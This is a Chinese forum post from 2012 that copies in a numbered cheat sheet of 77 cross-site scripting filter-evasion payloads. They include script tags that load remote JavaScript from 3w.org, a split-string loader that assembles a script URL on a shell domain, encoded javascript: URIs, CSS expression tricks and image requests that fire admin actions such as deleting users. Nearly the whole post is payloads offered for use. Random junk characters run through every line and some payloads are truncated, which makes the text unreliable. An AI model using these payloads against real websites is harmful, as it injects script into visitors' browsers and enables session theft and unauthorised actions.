貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。+ R% q' e9 q: ?& o. A0 b% y# u& O
; W8 H4 J! G r* r1 p( D3 e
(1)普通的XSS JavaScript注入
2 X3 t8 t$ B( v, u: D) v <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># h }! o% z3 p4 A U
7 e' G8 y9 v4 `6 x* ~2 U1 ? (2)IMG标签XSS使用JavaScript命令- g+ Z1 `* q& W. P9 e
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ Y. I. [$ e) `3 B
$ `& R& x1 I$ u
(3)IMG标签无分号无引号. T0 Q/ [# Y" y: e. J) w
<IMG SRC=javascript:alert(‘XSS’)>
* t$ Y$ |$ F' T; O' P) i0 ]' C U7 X# B& {4 Q/ h
(4)IMG标签大小写不敏感5 A/ A! X6 {" O9 R% `( S) t& C
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
. @1 X$ \/ y L1 \( e, a; k4 s) z: h3 S$ F) d. e. Z0 o
(5)HTML编码(必须有分号)8 A5 S; \/ S% Y
<IMG SRC=javascript:alert(“XSS”)>
. ?$ U7 z& h- M k) J/ ~6 M7 m/ R( y& D( \! N
(6)修正缺陷IMG标签
* G# h+ s. t" J- V- n3 E <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ \3 u$ k( ]4 Y$ o2 W( V( f( G# r7 c) V( t# k- d
(7)formCharCode标签(计算器)5 W% a8 X& [+ {
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))># I6 j+ t( s4 m
# O# E- t: b+ F) x6 S" | (8)UTF-8的Unicode编码(计算器)& e& E# @+ F" ?$ L6 _ E
<IMG SRC=jav..省略..S')>2 A5 |, U1 l' a/ `7 p4 S+ G
0 n' h1 ]4 b2 C% ]9 l1 @* L% \ (9)7位的UTF-8的Unicode编码是没有分号的(计算器)% Q* @5 f7 ~% _3 B/ b) U
<IMG SRC=jav..省略..S')>
% T. M8 x' s+ M8 d
# O& F2 r' d; M1 S' A4 g (10)十六进制编码也是没有分号(计算器)+ `& G4 }7 o$ X7 l
<IMG SRC=java..省略..XSS')>
: s& A, p8 x4 {' C9 H) G9 [
5 F2 M; P$ `# {: h# Q (11)嵌入式标签,将Javascript分开# @% v4 K" e- R' S2 V: k) |
<IMG SRC=”jav ascript:alert(‘XSS’);”>! J; \7 u* ^$ W0 j" |
+ p4 v" x5 h$ U. M; w0 q (12)嵌入式编码标签,将Javascript分开
$ O0 {: S# l/ H <IMG SRC=”jav ascript:alert(‘XSS’);”>% o1 g6 o5 N( R; b/ {
$ m" V7 P8 E- V' `( h
(13)嵌入式换行符
) D3 K# e# _7 }$ S <IMG SRC=”jav ascript:alert(‘XSS’);”>/ O: c9 g i! c, ^$ |' j# m
% u; Y) `% N e6 b# R& w+ \1 Z
(14)嵌入式回车
7 `. Z* B! P0 A- O" ~ <IMG SRC=”jav ascript:alert(‘XSS’);”>: k: v+ n% w( [, E: {% {# C
1 H1 ^. F; w/ C7 w- F9 s+ ~
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
, L; t6 F9 f8 w <IMG SRC=”javascript:alert(‘XSS‘)”>
5 A8 m( @: c1 r' c
) e/ ]' `" W# x! k2 V, C, G' u (16)解决限制字符(要求同页面)
. O! ?( ]- n2 R <script>z=’document.’</script>
) I0 {+ I" W: W% }* M( x <script>z=z+’write(“‘</script>
. N3 E3 Q8 L2 l7 J+ R( v6 L: Z' R <script>z=z+’<script’</script>
; l* L* s6 p0 [# z: F- W <script>z=z+’ src=ht’</script>7 Y7 T0 ^% O) i% y, y* a1 v# }* `
<script>z=z+’tp://ww’</script>
* Q( P. Q: v/ R& Q4 I9 s1 H+ j& w <script>z=z+’w.shell’</script>
- D! t! H/ p, S! ~, y* \ <script>z=z+’.net/1.’</script>
6 B }& s& l- \& D. U <script>z=z+’js></sc’</script>& c, I! N6 U' A2 R$ V' Y
<script>z=z+’ript>”)’</script>4 E( D7 Q3 x3 q2 {# r
<script>eval_r(z)</script>
% `9 i, ?- N; X9 v( ?! w3 Q8 t! X% E9 }1 ^0 M0 Q* L# T" n
(17)空字符8 R' ]0 r, c% v3 ~- K/ D, W
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
; O& {1 r! G: u$ U" G7 D8 Z, A# r. B4 `. J! }- c n
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
, Z. e. ~) m5 K7 L' P perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
: _* g! \2 `; Q( c* c
9 i1 |$ `! |# l4 S (19)Spaces和meta前的IMG标签
& I" `3 b0 ^: E% S <IMG SRC=” � javascript:alert(‘XSS’);”>
0 E6 p, d/ f. e5 w! M# e* _1 M4 |9 L5 a; _
(20)Non-alpha-non-digit XSS. N0 r k3 O* b+ {
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 h' h* X, `2 `0 q
; n4 G$ B; S7 M+ P9 E
(21)Non-alpha-non-digit XSS to 2! V0 a, a' c2 e! R1 t t4 w! x+ ~( b
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
7 w* [/ H- P4 k4 ^' Y3 y9 a* M
" b j' R7 M& u; U( C$ M (22)Non-alpha-non-digit XSS to 3
* M0 [4 a0 H1 ^8 W9 l& C* q+ n <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' }# Y0 V5 r) N" c9 {7 x' n
! T0 Z0 B; S1 m (23)双开括号, T$ d8 a0 s4 \ v6 w, f/ b
<<SCRIPT>alert(“XSS”);//<</SCRIPT>" d& W0 q$ o, \. i2 E
2 B2 }5 G! O* U/ Y" z (24)无结束脚本标记(仅火狐等浏览器)3 e9 T9 ^0 \$ o+ s2 t/ a5 j) a
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* Y2 U2 O0 f! ]0 i7 p
9 M+ N. i* u" l (25)无结束脚本标记2
1 v# z. j. Y" A% D$ m+ m- \2 t <SCRIPT SRC=//3w.org/XSS/xss.js>, B `1 S. p- e5 C. h' X, y! U
" |* D8 R. l( P0 ]* s7 J; B) L (26)半开的HTML/JavaScript XSS
5 I: h6 s; W" A/ e+ X0 v0 [ <IMG SRC=”javascript:alert(‘XSS’)”
( o4 [, I+ W. n- _& J I5 \ \4 Z c3 w1 D4 }- e
(27)双开角括号# p+ {5 _: `1 V
<iframe src=http://3w.org/XSS.html <& I$ I$ L5 Y0 F- G5 J$ a0 X3 J! A
% \3 x9 i3 H! x4 P: q# s (28)无单引号 双引号 分号
: N2 n' D3 J' F2 n; u' @ <SCRIPT>a=/XSS/
0 }/ L' x8 N* a2 Z" H$ x# A alert(a.source)</SCRIPT>% D' K- K9 d) E1 I
9 H) \, s/ e8 ~. w9 O8 z5 w
(29)换码过滤的JavaScript
0 _! V6 r; Y/ L+ p8 S \”;alert(‘XSS’);//
* `- |- C. b" R: e0 q# Q& u3 u+ ^
* E9 ?! O4 U- t% d2 D4 ^' u (30)结束Title标签
& e/ }( s& [& r e7 L3 x2 v9 ~1 Q </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
$ e; N+ c7 [2 [9 g0 P1 x
3 G @) R3 q$ @% ?$ z( O (31)Input Image
" S6 j \) E9 ^& N$ T$ L <INPUT SRC=”javascript:alert(‘XSS’);”>
: c5 |; ?7 h6 _# T
5 v/ U3 T5 J2 F( k$ J (32)BODY Image
% c8 x# Y8 {+ E, J <BODY BACKGROUND=”javascript:alert(‘XSS’)”>% ?2 T" d! ~2 X8 U- W; ?" i
+ f( l @) P& ^) M/ a! _, b$ o
(33)BODY标签) A8 B. I1 H( p5 V- q, d* q
<BODY(‘XSS’)>
. G1 z! S( ?8 s4 ? ]2 D; I; o% Y
(34)IMG Dynsrc9 P8 P4 I7 w, l, I4 H, q% P
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
0 W% Z4 |' }& i1 u% j* T% {' j
(35)IMG Lowsrc" a# @( P, K0 u |9 t
<IMG LOWSRC=”javascript:alert(‘XSS’)”>/ u9 E7 M% O0 `! H6 B% Y( S
m6 x: w7 s/ Q# ~: \& b
(36)BGSOUND
" s+ G$ B9 Q+ F- H <BGSOUND SRC=”javascript:alert(‘XSS’);”>
* R# H/ m( s; ?/ W! }8 ^! B
: S: E- p9 {8 }9 Z0 h; _& \ (37)STYLE sheet
( c+ J6 ~2 q; e* d <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
1 N, C- b; v& c8 \5 J) W9 Y' w" [; i( G \0 o* d- u* r3 L
(38)远程样式表
" E8 l; Y- {( a8 T0 ` <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. |* C8 a& T: g8 f- B$ p' \6 _3 x7 w2 h; X# i3 |; _+ @8 Q- D
(39)List-style-image(列表式). f; J/ u1 K9 a! Y6 @1 N8 {
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
0 B' {1 C- ?# ~9 M) l; e
& F0 ~& `% X1 o* i/ P; I' ] (40)IMG VBscript' E, S# q# L4 E7 N5 c" j3 x8 }
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 H9 ~0 ~( J4 ^$ b# a1 j
% X5 |7 n! k% @7 Z% y5 K (41)META链接url
+ ]% |1 A9 d5 X7 ?# k" ~ <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
+ ]. a" C2 y6 ~, r$ }8 q' Q# i( `; Y% ?; ~
(42)Iframe
" k' D/ x( V& B2 P. ^: Q <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
3 Q$ g8 G' i. W: g* x5 L9 {( c! V1 [/ a6 A# {1 N2 d
(43)Frame
( }& E) r, v$ V4 C ]4 n7 A8 v <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>5 n! x3 x7 W( X) r. l4 m
1 k4 _' s, m' ~2 b( T% R (44)Table1 [$ I3 M/ @9 u+ x
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>% D# m, l% _8 o5 S' L8 ^
7 N; d4 M% e% V0 U6 x4 m) @ (45)TD1 X% O0 n7 D. T/ T9 z. l1 o1 @$ P6 p0 m
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 ], v% [1 g. `6 L
+ }3 P! h8 F" y2 O7 m9 w (46)DIV background-image/ r J$ k( ^1 y) {
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! N" g% X( Q V9 o& S4 U0 Z9 R+ V- m5 C
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
7 d: \7 A. V9 a, ~( d! J( n <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
6 [" z2 m9 H% Z+ K! E' {3 \! Z0 I. G. w" P d
(48)DIV expression6 [. l& k8 m& [' j. h
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) g+ H. s. r `2 T4 Z8 r# G
6 m2 D* V' _! d7 l9 v3 g2 p) n0 F (49)STYLE属性分拆表达/ A5 e1 E. x* W, O' v
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>8 C* {- x1 V. ?' x' C5 \4 D
3 b8 m; j, K& o& h' {0 H$ @
(50)匿名STYLE(组成:开角号和一个字母开头)- y. \! K3 t2 o( j1 A [# h4 P8 F
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
% a. K5 }' [" y; d4 n7 \6 B- G2 E
3 O5 \3 L7 J( {6 q (51)STYLE background-image
9 k0 a7 E' ?1 l* a <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>% T3 I7 o8 K* t
) L2 E& E# d6 T( E5 s (52)IMG STYLE方式# z4 Q- R2 x& j# }5 d5 E2 y& ]
exppression(alert(“XSS”))’>
4 H6 |! y, q8 ?: A# [( e" A8 H/ X4 {. G8 Q: G, x
(53)STYLE background8 V$ w) u6 m+ p
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
" g5 o, I6 G( {' z! W
8 N1 [/ V9 G/ I$ @ (54)BASE
6 a ]5 _# U& d <BASE HREF=”javascript:alert(‘XSS’);//”>' W4 o0 b0 x5 P4 r- r
/ O; q5 b7 P P1 w, }& r& s" _
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 e; E# ~' p$ J' H: C <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>( A+ v6 d# t; D* n6 k0 c
3 |, e( l' h* H# I2 x% V2 R
(56)在flash中使用ActionScrpt可以混进你XSS的代码
# E/ |( V) q+ ~4 G! x" D& V a=”get”;, D$ I- l* W8 f* c
b=”URL(\”";
0 x) }$ A1 I4 V) U" s c=”javascript:”;4 ~7 }1 h+ k% p
d=”alert(‘XSS’);\”)”;
; _6 B$ ~$ y3 y1 Q4 N eval_r(a+b+c+d);
. b5 D. a) p: w1 F8 ^" H6 e/ Z+ @ f$ q+ |! T0 o8 N# f
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
4 Q/ T6 y+ A6 ^" R& M: V5 x) T <HTML xmlns:xss>5 }1 e6 B0 i# Z. `
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”> D& X7 { @" i
<xss:xss>XSS</xss:xss>
) p1 i5 X2 K& ^5 @ </HTML>6 r( K4 U- Y8 d1 h( J
3 T3 Q6 h. p4 N+ Q. ]7 h/ e
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
# c2 o2 F8 V) o5 g8 E8 Q) x <SCRIPT SRC=””></SCRIPT># n% W* v: J" B4 p' f+ V
9 V# @. b+ |* _ |) W4 @/ e (59)IMG嵌入式命令,可执行任意命令
9 U* P# p5 n0 e1 [& K <IMG SRC=”http://www.XXX.com/a.php?a=b”>
& e; F. @" X* b: ~5 ]. r1 |0 X
, Z; K! P) Q/ R: s/ r# G$ G, j3 F (60)IMG嵌入式命令(a.jpg在同服务器)
4 c# m, ~/ w0 m: f) N3 a Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser2 a8 d, l& ^' {3 i# t6 s2 u' @; X
G% j0 m: \1 L. a+ K (61)绕符号过滤
- Y5 o7 v2 q: R$ `6 C" J0 `+ a <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>& F w" y* K7 b) H$ ]
( C$ W* z' h( y! U* J ? (62)
% ^; z2 C, o. A* H <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 I8 ^3 O' [" g7 F5 k9 L. l7 h" `% c4 K3 c5 d
(63)* ~7 m, J! I! {' t6 `9 ]
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>3 i9 Q5 P7 f; s
" q- I3 K& u( V/ \4 W
(64)
6 t5 \3 {/ D$ [( g9 v: R% b <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
* g0 V+ K: b& W& F
. H* T" G1 Q- N/ p (65)1 x \/ x0 g2 e9 m, E8 o4 ?" h
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>/ K1 a. a8 |0 s. d2 S: e
" v1 [4 S& S! G. m6 [
(66)
2 F" x' s: l1 p! X* z <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>0 `1 I& y1 k M* v
- O; N2 {4 C! ]% ` (67)( z( `- M' J4 J# B0 T/ _; |0 a
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>+ ]9 N q d' [9 e6 h6 f! Z
: A& K/ u; }5 f; Z; x4 Q' c( m (68)URL绕行
: F) @' D! p9 c' ]! v <A HREF=”http://127.0.0.1/”>XSS</A>" h3 T' ]* i8 D3 I7 K) Y7 ~* m
. M3 p' S4 [4 A8 X5 |( s r% G# }
(69)URL编码
; e- f( T! _$ E4 k* L/ S <A HREF=”http://3w.org”>XSS</A>
) Q# f# q9 J# `0 i3 j% F% j+ B4 V' [* ?% `8 [$ {' H
(70)IP十进制
% e2 g! N- t$ v3 G <A HREF=”http://3232235521″>XSS</A>
; s i9 f u6 X0 R0 j+ q
' e( K8 J3 E4 h# I9 e' O d5 L (71)IP十六进制
6 v8 ^1 L) g- p' p8 m% \0 j' ^ <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ s! j" ~1 E) y$ Q/ N
2 F8 ?, H& Q+ ~0 O* } (72)IP八进制
: M4 {( J) ?& [0 R1 F5 C- L <A HREF=”http://0300.0250.0000.0001″>XSS</A>% o1 h! D; v' @4 W
6 e- O( G9 U* K
(73)混合编码2 Q- w* y$ M8 n/ n c. O$ f
<A HREF=”h c5 U) }6 P7 E. f7 s/ s
tt p://6 6.000146.0×7.147/”">XSS</A>
# }7 X$ I+ l. c
6 p% Q' |( ]! s6 x) c. B (74)节省[http:]
7 [! V% T/ x- W' G7 _ <A HREF=”//www.google.com/”>XSS</A>3 e. T2 w% ]% f& A
( S$ N; c4 v" [# I0 h& ~# T
(75)节省[www]9 i. _4 o- ^2 A" M K
<A HREF=”http://google.com/”>XSS</A>
- b7 R6 v0 o* }$ }* G0 z2 D" T8 b# g7 S
(76)绝对点绝对DNS2 I, S9 D, @, P
<A HREF=”http://www.google.com./”>XSS</A>
( _& \% c# H( {7 m! E9 j
8 V( Z' h4 {2 u (77)javascript链接2 o' R' H k: H$ p) E f- s3 m; X
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对